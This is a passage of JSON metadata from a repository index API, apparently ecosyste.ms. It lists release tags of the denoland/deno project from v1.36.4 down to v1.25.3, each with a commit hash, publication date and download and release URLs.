enoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub